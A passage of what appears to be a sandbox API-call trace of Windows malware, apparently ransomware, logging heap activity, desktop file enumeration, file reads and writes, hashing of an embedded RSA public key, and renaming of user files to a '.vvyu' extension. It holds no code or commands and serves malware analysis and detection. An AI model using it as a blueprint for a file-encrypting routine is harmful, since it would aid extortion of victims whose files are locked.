lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e97680 | out: hHeap=0x620000) returned 1 [0192.278] GetCurrentThreadId () returned 0x66c [0192.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e1d0 [0192.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.278] GetCurrentThreadId () returned 0x66c [0192.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935e8 [0192.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93558 [0192.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93600 [0192.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93618 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935b8 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93540 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e97680 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e97890 [0192.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0192.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e97aa8 [0192.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e97890 | out: hHeap=0x620000) returned 1 [0192.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e97aa8 | out: hHeap=0x620000) returned 1 [0192.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93600 | out: hHeap=0x620000) returned 1 [0192.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94a80 | out: hHeap=0x620000) returned 1 [0192.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e97680 | out: hHeap=0x620000) returned 1 [0192.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.289] WriteFile (in: hFile=0x568, lpBuffer=0x2e96a68*, nNumberOfBytesToWrite=0xc08, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e96a68*, lpNumberOfBytesWritten=0x312fb14*=0xc08, lpOverlapped=0x0) returned 1 [0192.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.290] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xc0d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.290] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0192.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0192.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.291] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0192.292] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.292] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.292] CloseHandle (hObject=0x568) returned 1 [0192.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2e96a68 [0192.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.293] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\cTaPN4HhRqe86tN.rtf" (normalized: "c:\\users\\keecfmwgj\\desktop\\ctapn4hhrqe86tn.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\cTaPN4HhRqe86tN.rtf.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ctapn4hhrqe86tn.rtf.vvyu")) returned 1 [0192.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.296] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.299] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f4710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0192.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94a80 [0192.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0192.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94a80 | out: hHeap=0x620000) returned 1 [0192.300] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini") returned=".ini" [0192.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.300] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2064e0c0, ftCreationTime.dwHighDateTime=0x1d8a3c0, ftLastAccessTime.dwLowDateTime=0x6029ced0, ftLastAccessTime.dwHighDateTime=0x1d8a3f4, ftLastWriteTime.dwLowDateTime=0x6029ced0, ftLastWriteTime.dwHighDateTime=0x1d8a3f4, nFileSizeHigh=0x0, nFileSizeLow=0xd99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hSxa8JYxcBSx17jA94r_.jpg", cAlternateFileName="HSXA8J~1.JPG")) returned 1 [0192.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94a80 [0192.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0192.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94a80 | out: hHeap=0x620000) returned 1 [0192.300] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\hSxa8JYxcBSx17jA94r_.jpg") returned=".jpg" [0192.300] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\hSxa8JYxcBSx17jA94r_.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\hsxa8jyxcbsx17ja94r_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.301] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=3481) returned 1 [0192.301] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.304] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.304] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.305] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.305] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xd99, lpOverlapped=0x0) returned 1 [0192.305] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.306] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.306] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.306] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.307] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.307] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.307] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.307] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.307] GetLastError () returned 0x0 [0192.307] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.307] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.308] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.308] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.308] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xda0) returned 0x2e96a68 [0192.308] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94a80 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95188 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 